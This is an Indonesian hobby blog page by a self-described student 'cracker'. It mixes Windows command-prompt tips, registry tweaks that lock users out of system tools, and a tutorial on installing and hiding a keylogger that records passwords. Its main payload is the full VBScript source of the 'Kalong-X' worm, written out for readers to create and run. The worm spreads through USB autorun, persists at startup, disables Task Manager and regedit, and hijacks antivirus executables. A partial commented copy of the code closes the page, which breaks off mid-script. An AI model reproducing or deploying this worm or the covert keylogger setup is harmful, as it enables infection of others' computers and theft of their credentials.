iwan
by politik mania | 05.20 in Ilmu Komputer | komentar (0)
WelComE... di situs iwan
Gw tu...orang nya PiNteR,Baik Hati
Karya Di Sini Punya CracKer TKJ2 100%
Saya Punya IlmU Ga Diam Diam, CracKer Akan Mengasi ilmu Dasar Komputer ( Jaringan )
HAi.... Kalian Sebagai ANAK TKj bukanya jangan FRiendster,facebook DLL Karena efek friendster dan facebook kebanyakan negatif dari pada positif
Lebih baik Kalian Belajar Komputer Ala CraCkEr TkJ2 Dengan Situs : www.iwanjakarta.blogspot.com
www.gerindradprri.ucoz.com
Walaupun SitUs Sederhana...! Ilmu nya Sangat banyak.
BiOdAtA gw
- Nama ( CracKER )
- Kelas CrAcKer < TKJ2 >
- HoBi Main BoLa
- ScHooL SiSwa SMK ...
- Jurusan TKJ ( CracKER )
- Sifat Suka Jailin Jaringan KompUteR OranG
Karena GW orang baik, Gw akan... ngajarin LoE tentang Komputer
1 Dasar Komputer, cara membuka regedit.. YaNg terkena virus atau TiDaK di iZinkan oleh Administrator
Langkah Pertama - Klik STArt, Buka RUN
- KeTiK CMD,TiNggAL LoE KeTiK
- REG DELETE
HKCU\software\microsoft\windows\currentversion\system /v disableregistrytools
- Pilih Y, LaLu EnTeR
- BerARti... ReGediT LoE.. UdaH Ke BuKa HoRe...
SekaRanG GW...! AkaN NgaJarIn LoE TeNtaNG Komputer LaGi
- sekarang GW akAn ngaJaRiN LoE tentang MemBuKa CMD YaNg TerKena Virus ATAU Tidak Bisa Di BUKA.
LaNgKah PErtama, SEbenanya Caranya ADA Dua. KarEnA Gw OrAnG baiK,GW PasTi NgAjArin Loe SEMUA
Cara Pertama 1 Buka NOTEPAD
2 LOe HaRus KeTiK SePeRtI Ini..
3 - @echo of
- command
- @echo on
4 LoE.. Harus Pilih SAVE AS
Text document, Loe GaNtI ALL Files
LoE NamaIN Terserah, YaNg PentInG extenSnya .BAT
CoNtOh : CMD.bat
LaNgKaH Ke DUA, LOE.. BuKa MIcrosoft WorD, Loe HarUs TuLis Seperti di bawah ini
1 File:///c:/windows/system32/cmd.exe
2 TeKaN EnTeR AtAu SpAcE. Nanti akan TerBeNtUk SeBuAh LiNk BeRwArNa Biru
3 TeKan CTRL, SaMbIL mengklil link tersebut, Maka CMD Bisa TerBuKa.
DiSini Gw Akan Ngajarin lOe Lagi... TeNtaNg MaKna Kata CMD Ok..
Kata DI BawaH InI AdaLaH Kata Kata KaMus BaHaSa CMD, Loe Hapalin Ok KarENA InI sanGaT BerGuNa..?
ADDUSERS - Memasukkan/ menambah user ke/dari file CSV.
ARP - Address Resolution Protocol
ASSOC Change - file extension associations
ASSOCIAT - One step file association
AT Schedule - Perintah untuk membuat shedule program (utk dijalankan kemudian waktu)
ATTRIB - Mengganti atribut file
BOOTCFG - Edit boot setting windows
BROWSTAT - Mencari info domain,browser dan PDC
CACLS - Mengganti/mengubah file permissions
CALL - Memanggil sebuah program batch
CD - Memindahkan ke sebuah folder tertentu.
CHANGE - Mengubah Properties pada Terminal Server
CHKDSK - Memeriksa dan memperbaiki file system
CHKNTFS - Memeriksa NTFS file system
CHOICE - Menerima input keyboard ke dalam sebuah batch file
CIPHER - Encrypt-Decrypt files/folders
CleanMgr - Membersihkan secara otomatis Temporary files, recycle bin
CLEARMEM - Membersihkan memory
CLIP - meng-Copy STDIN ke Windows clipboard.
CLS - Membersihkan layar CMD
CLUSTER - Windows Clustering
CMD - Membuka layar CMD/ command prompt
COLOR - Mengganti warna pada window CMD
COMP - Membandingkan isi dari 2 atau lebih file
COMPACT - kompres file/folder di dalam partisi NTFS
COMPRESS - kompres file individu di dalam partisi NTFS
CON2PRT - Connect atau disconnect sebuah Printer
CONVERT - Convert FAT drive menjadi NTFS.
COPY - Copy 1 atau lebih file ke lokasi tertentu
CSVDE - Import/Export Active Directory data
DATE - Menampilkan/mengatur tanggal
Dcomcnfg - DCOM Configuration Utility
DEFRAG - Defragment hard drive
DEL - Menghapus 1 atau lebih file
DELPROF - Menghapus User Profile NT
DELTREE - Menghapus sebuah folder beserta subfolder
DevCon - Device Manager Command Line Utility
DIR - Menampilkan daftar file/folder dari sebuah drive
DIRUSE - Menampilkan disk usage/kapasitas disk
DISKCOMP - Membandingkan isi dari 2 buah floppy disk
DISKCOPY - Copy isi dari sebuah floppy disk ke floppy disk lainnya
DNSSTAT - DNS Statistics
DOSKEY - Mengedit command line,recall commands,dan create macros
DSADD - Menambah user (computer, group..) ke dalam active directory
DSQUERY - Menambah item ke dalam active directory
DSMOD - Modify user (computer, group..) di dalam active directory
ECHO - Menampilkan message pada monitor
ERASE - Menghapus satu atau lebih file
EXIT - keluar dari window CMD
EXPAND - Uncompress file
EXTRACT - Uncompress CAB files
FC - Membandingkan 2 buah file
FDISK - Disk Format dan partition
FIND - Mencari sebuah text string di dalam sebuah file
FINDSTR - Mencari strings di dalam files
FOR /F -Loop command: untuk beberapa files sekaligus
FOR - Loop command: all options Files, Directory, List
FORFILES - Batch process multiple files
FORMAT - Memformat sebuah disk
FREEDISK - Menampilkan free disk space (dalam bytes)
FSUTIL - File and Volume utilities
FTP - File Transfer Protocol
FTYPE - Menampilkan/mengubah file types yg digunakan dalam file extension
GLOBAL - Menampilkan daftar anggota dalam global groups
GOTO - Mengarahkan sebuah program batch untuk melompat ke labelled line
HELP - Online Help
HFNETCHK - Network Security Hotfix Checker
IF - Conditionally perform a command (perintah bersyarat)
IPCONFIG - Configure IP
KILL - Menghapus program dari memory
LABEL - Memberi/mengubah label disk
LOCAL - Menampilkan daftar anggota local groups
LOGEVENT - Menulis text ke dalam NT event viewer.
LOGOFF - Keluar dari system / Mengeluarkan user dari system
LOGTIME - mencatat tanggal dan waktu dalam sebuah file
MAPISEND - Mengirim e-mail dari command line
MEM - Menampilkan memory usage
MD - Create new folders
MODE - Configure a system device
MOUNTVOL - Mengatur Mount point dalam sebuah volume
MOVE - Memindahkan file dari sebuah folder ke folder lain
MOVEUSER - Menindahkan user dari sebuah domain ke domain lain
MSG - Mengirim message
MSIEXEC - Microsoft Windows Installer
MSINFO - Windows NT diagnostics
MSTSC - Terminal Server Connection (Remote Desktop Protocol)
MUNGE - Mencari dan Menganti text di dalam sebuah file (find & replace)
MV - Meng-copy file yang sedang/sementara digunakan
NET - Mengatur network resources
NETDOM - Domain Manager
NETSH - Configure network protocols
NETSVC - Command-line Service Controller
NBTSTAT - Menampilkan networking statistics (NetBIOS over TCP/IP)
NETSTAT - Menampilkan networking statistics (TCP/IP)
NOW - Menampilkan current Date and Time
NSLOOKUP - Name server lookup
NTBACKUP - Backup folders
NTRIGHTS - Edit user account rights (wilayah akses yg diizinkan oleh admin)
PATH - Menampilkan atau mengatur search path untuk executable files
PATHPING - Melacak route plus network latency dan packet loss
PAUSE - Menahan proses sebuah batch file and menampilkan message
PERMS - Menampilkan permissions (wilayah akses) user
PERFMON - Performance Monitor
PING - Menguji (test) network connection
POPD - Restore previous value dari sebuah directory yang di-save oleh PUSHD
PORTQRY - Menampilkan status ports dan service
PRINT - Print text file
PRNCNFG - Menampilkan, mengatur, atau mengubah nama printer
PRNMNGR - Menampilkan, menghapus, atau menambah daftar printer; set default printer
PROMPT - Mengubah command prompt
PsExec - Menjalankan proses jarak jauh (remote)
PsFile - Menunjukkan file2 yang dibuka dari jarak jauh
PsGetSid - Menampilkan SID sebuah computer atau user
PsInfo - Menampilkan informasi dari sebuah system
PsKill - Menghentikan proses melalui process ID
PsList - Menampilkan detail informasi dari sebuah proses
PsLoggedOn - Who's logged on (mengecek secara lokal atau melalui resource sharing)
PsLogList - Event log records
PsPasswd - Mengubah account password
PsService - Menampilkan dan mengubah services
PsShutdown - Shutdown atau reboot computer
PsSuspend - Suspend/menahan proces
PUSHD - Menyimpan/Save dan mengganti current directory
QGREP - Mencari kata/kalimat di dalam file yg sesuai dgn pola/line yg ditentukan.
RASDIAL - Mengatur RAS connections
RASPHONE - Mengatur RAS connections
RECOVER - Memulihkan/Recover damaged file dari sebuah disk defective (rusak).
REG - Membaca, mengatur, atau menghapus registry keys dan values
REGEDIT - Mengimport/mengeksport registry settings
REGSVR32 - Register/unregister file DLL atau ocx
REGINI - Mengubah Registry Permissions
REM - Merekam/mencatat comments (remarks) di dalam sebuah batch file
REN - mengubah nama file
REPLACE - Mengganti/Replace atau meng-update sebuah file dengan file line
RD - Delete folder
RDISK - Create Recovery Disk
RMTSHARE - Share folder atau printer
ROUTE - Memanipulasi network routing tables
RUNAS - Menjalankan sebuah program dgn menggunakan user account lain.
RUNDLL32 - Menjalankan sebuah DLL command (add/remove print connections)
SC - Service Control
SCHTASKS - Create or Edit Scheduled Tasks
SCLIST - Display NT Services
ScriptIt - Control GUI applications
SET - Display, set, atau remove environment variables
SETX - Set environment variables secara permanent
SHARE - Mendaftar atau edit sebuah file share atau print share
SHORTCUT - Create windows shortcut (.LNK file)
SHOWGRPS - Menampilkan daftar NT Workgroups atau user yang telah joined
SHOWMBRS - Menampilkan daftar Users yg merupakan member dari sebuah Workgroup
SHUTDOWN - Shutdown computer
SLEEP - Menunggu selama beberapa saat
SOON - Menjadwal(schedule) sebuah command untuk beberapa waktu kemudian
SORT - Sort input
START - membuka sebuah window baru, untuk menjalankan program atau command tertentu
SU - Switch User
SUBINACL - Edit file & folder Permissions, Ownership serta Domain
SUBST - Menyesuaikan sebuah path dengan drive letter
SYSTEMINFO - Menampilkan daftar system configuration
TASKLIST - Menampilkan daftar aplikasi dan service yang sedang berjalan
TIME - Menampilkan atau mengubah waktu pada system
TIMEOUT - Delay processing sebuah batch file
TITLE - Menentukan judul window untuk sebuah session CMD.EXE
TOUCH - mengubah timestamps sebuah file
TRACERT - Melacak route ke sebuah remote host
TREE - Tampilan grafis dari struktur folder
TYPE - Menampilkan isi dari sebuah text file
USRSTAT - Menampilkan daftar domain usernames dan last login
VER - Menampilkan version information
VERIFY - Memeriksa apakah files telah ter-save
VOL - Menampilkan disk label
WHERE - Mencari dan menampilkan files di dalam sebuah directory tree
WHOAMI - Menampilkan current UserName dan current domain
WINDIFF - Membandingkan isi dari dua atau lebih file.
WINMSD - Windows system diagnostics
WINMSDP - Windows system diagnostics II
WMIC - WMI Commands
XCACLS - Mengubah file permissions (hak akses)
XCOPY - Copy files dan folders
JANGAN LUPA ILMU GW... DI AJARIN KE TEMAN LOE.... OK
Di sini Gw Akan NgAjArin LoE tentang TriK REgEdit, Apa SIh Regedit itU ?
Regedit AdaLaH salah satu gerbang untuk merubah dan melihat isi dari
registrywindowskita.
registry AdAlAh pusat dari hampir semua konfigurasi windows.
Disini Gw Akan ngajarin loe.. semua trik regedit. yang hanya gw tau aja ok..
1 Melarang copy/cut dari komputer ke flasdisk
- run > regedit >HKEY_LOCALMACHINE\SYSTEM\CurrentControlSet\Control
Di folder CONTROL klik kanan >New>Key
beri nama “StorageDevicePolicies”
selanjutnya di panel sebelah kanan “StorageDevicePolicies”, klik kanan >New>Dword
dan beri nama “WriteProtect” dan dobel klik key WriteProtect,
ganti Value Data jadi 1, dan terakhir Restart komputer anda.
Cara membuat seperti semula balikin value key “WriteProtect” menjadi 0
2 Menghilangkan Akses display seting
- klik Start—->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoDispCPL
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)
3 Mematikan network control PanEL
- Klik Start—->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Network
Value Name:NoNetSetup
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan
4 MeMatikan TaB DeViCe MaNaGer
- Klik Start—->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoDevMgrPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan
5 MeMaTiKaN Tombol FiLe SySTem
- Klik Start—->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
Value Name: NoFileSysPage
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan)
6 Menyembunyikan Menu RUN
- Klik Start—>Run, ketikkan regedit lalu tekan Enter.
Key :HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name : NoRun
Data Type : REG_DWORD
Data: (0=disable, 1=enable)
7 MenyembunyiKAN Menu folder SeTiNg < Folder option >
- Klik Start—->Run, ketikkan regedit lalu tekan Enter.
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Value Name: NoSetFolder
Data Type: REG_DWORD
Data: (0 = disabled, 1 = enabled/sembunyikan
8 MemaTiKaN ProgRam NoT ReSpOnDiNg
- klik start–>run ketikkan regedit lalu tekan enter
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik ganda AutoEndTasks dan masukkan angka 1 pada Value Data
KeyLoger HacK JarinGan
Karena Gw CracKer Gw Akan Ngasi tau LOe... Semua Cara Dasar Hack Jaringan
Anda dapat mendistribusikan materi ini secara gratis.
http://gerindradprri.ucoz.com 2009
1
Keyloger, Software
Pencuri Password !!!
Oleh : CraCkEr TkJ BeKaSi
Lattar Bellakang
Puji syukur kepada Allah SWT yang telah memberikan nikmat berupa kekuatan dan akal
sehingga penulis bisa menuangkan gagasan di sini. Sholawat serta salam kita haturkan
kepada Nabi Muhammad SAW yang telah membawa kita dari alam kebodohan ke alam
pencerahan.
Mengetik adalah kegiatan yang biasa dan mudah untuk kita lakukan. Aktivitas itu sudah
biasa kita lakukan di computer. Apalagi dengan Anda yang biasa berinternet ria. Anda
dapat melakukan berbagai hal di internet seperti, email, chating, blogging, transfer via ebanking,
social networking dan sebagainya. Semua aktivitas tersebut membutuhkan
username dan password.
Username dan password adalah sesuatu yang sangat rahasia. Saking rahasianya, bahkan
orang terdekat-pun tidak boleh tahu. ??????Kalo hanya sekedar password email, masa istri
tidak boleh tahu??? Email kan tidak penting??? Kata siapa tidak penting. Ya kalo email
tersebut hanya berisi surat-surat biasa sih ya tidak apa-apa, kalau berisi transaksi jual beli,
username dan password suatu bank dan lain-lain … Lha kan sangat penting.. Bahkan sangat
penting sekali…
Banyak sekali kejadian bahwa username dan password dari suatu account seseorang dibajak
orang. Artinya kita tidak dapat lagi mengakses account kita. Pernah suatu ketika, teman
saya datang kepada saya, dan melaporkan bahwa account e-currency (pembayaran
electronic), hilang sebesar US $ 500, atau sekitar 5 juta rupiah waktu itu, setelah telusur
punya telusur beliau pernah log in di warnet. Apakah log in di warnet itu berbahaya?? Bisa
ya bisa tidak. Lho kalau warnet tersebut dipasangi keyloger bagaimana ? Apa itu keyloger ?
Hati-hati bila Anda melakukan Aktivitas di computer. Jika Anda memasukkan username
dan password pada computer, teliti dulu, apakah computer tersebut dipasang keylogger?
Bisa-bisa username dan password Anda dibajak orang….. Bagaimana cara
menanggulanginya ?
Anda dapat mendistribusikan materi ini secara gratis.
Berdasarkan pengalaman teman saya itu, maka kita bahas apa itu keyloger, agar kita
nantinya berhati-hati bila kita dan tahu bagaimana cara menangkal keyloger tersebut.
Apa iittu Keylloger?
Keyloger adalah software pencatat aktivitas yang dilakukan oleh kita di computer. Apapun
yang kita ketikkan di computer, maka akan tercatat oleh keyloger tersebut. Dari kita
menekan a-z, 0-9, kombinasi keyboard seperti ctrl+A dan lain-lain akan tercatat oleh
keylogger. Keylogger akan mencatatnya dalam bentuk file teks, *.txt.
Cara kerja keyloger bersifat hidden (tersembunyi). Biasanya dia akan muncul di systray jika
kita melakukan kombinasi keyboard (shortcut tertentu). Begitu kita menekan kombinasi
keyboard, maka icon keylogger akan muncul di systray.
Untuk mempermudah dan mengerti cara kerja keylogger, maka Anda bisa mempraktekkan
di computer Anda… Materi ini digunakan untuk membantu kita terhindar dari kejahatan
alat elektronik …
IInsttallll Keylloger
Sebelumnya Anda bisa download keyloger di sini. Setelah kita mendapatkan keyloger,
maka kita install di computer kita, dengan klik kanan dan klik Open
Install keyloger
Anda dapat mendistribusikan materi ini secara gratis.
3
Setelah itu muncul dialog dari keylogger
Dialog installasi
Klik I Agree sehingga muncul dialog installasi
Dialog installasi untuk pemilihan komponen
Anda dapat mendistribusikan materi ini secara gratis.
4
Buang centang pada Start Menu Shorcuts, jika centang tersebut tidak dibuang maka
keylogger akan muncul di Start??Program. Setelah itu kemudian klik Next, sehingga
Installasi keylogger
Setelah itu klik install, sehingga muncul dialog seperti gambar 6 di bawah:
Gambar 6. Installasi komplit
Anda dapat mendistribusikan materi ini secara gratis.
5
Setelah itu klik Close, dan shortcut keylogger akan muncul di systray (pojok kanan bawah)
seperti Gambar 7.
Gambar 7. Systray Family Keylogger v2.83
Menggunakan Keyllogger
Setelah Anda selesai menginstall keylogger, coba Anda melakukan aktivitas pengetikkan.
Setelah itu klik ganda klik kanan icon keylogger, dan klik view log seperti Gambar 8 di
bawah :
Melihat hasil keylogger
Anda dapat mendistribusikan materi ini secara gratis.
6
Kemudian hasil dari pencatatan keylogger
Hasil pencatatan keylogger.
Anda dapat mendistribusikan materi ini secara gratis.
7
Menyembunyiikan IIcon Keyllogger
Icon Keylogger biasanya disembunyikan. Tidak akan kelihatan seperti itu di icon systray.
Cara menyembunyikan adalah dengan klik Kanan Icon keylogger dan klik Hide Icon seperti
Kemudian akan muncul dialog peringatan dari keylogger seperti Gambar 11 di bawah ;
Gambar 11. Peringatan Keylogger
Dari Gambar 11, Kemudian klik OK untuk menyembunyikan. Kita diberitahukan bahwa
untuk melihat kembali icon yang telah disembunyikan adalah dengan menekan kombinasi
huruf Ctrl+ALT+Shift+F.
Anda dapat mendistribusikan materi ini secara gratis.
8
Langkah Aman dallam Menggunakan Komputter
Setelah mengetahui hal tersebut, maka sebelum kita menggunakan computer, maka kita
periksa dulu apakah computer yang akan kita pakai dipasang keylogger atau tidak.
Langkahnya adalah sebagai berikut :
Tekan kombinasi Tombol Ctrl+Shift+Alt+F, jika tidak muncul Icon keylogger berarti kita
aman untuk melanjutkan
Jika muncul Icon keylogger, maka matikan keylogger dengan cara klik kanan icon
keylogger, kemudian klik Exit, seperti Gambar 12 di bawah.
Mematikan Keylogger
Dengan melakukan langkah tersebut, maka kita akan aman mengetik dengan puas tanpa
ada gangguan dari mata-mata pengintai password.
Semoga materi ini bermanfaat…
Anda dapat mendistribusikan materi ini secara gratis.
9
Penuttup
Masih banyak tips dan trik tentang computer yang akan kita bahas.. Sekian dan selamat
mencoba. Jika ada pertranyaan silakan kirim ke email : Rahasia ( ?? ) CracKer BekasI
Di sini CracKer Akan Mengajarkan Membuat Virus Dengan NotePAD, PerHatikan Baik Baik DI SINI
Make Virus Via Notepad
for everyone
BUAT VIRUS VIA NOTEPAD”
kita akan membuat virus yang lebih hebat lagi. Kalau ada yang belum tahu, saya mau minta maaf karena di artikel sebelumnya ada kesalahan code. Silahkan ganti kata “rekursif” menjadi “rekur”. Kalau enggak, bisa syntax error nanti
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next
‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd
’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39
’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39
set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)
‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”
‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD”
‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”
‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”
‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”
‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :
Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.ini adalah tutorial milik teman aku tapi tenang aja da kurubah sintak programnya di di bagian regisry nya kali
Tags: virus
0 comments share
Make Virus Is Easy
Jul 17, '08 10:51 PM
for everyone
'//--Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus--//
on error resume next
'//--Dim kata-kata berikut ini--//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
'//--Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information--//
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
'//--Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
tf.attributes = 32
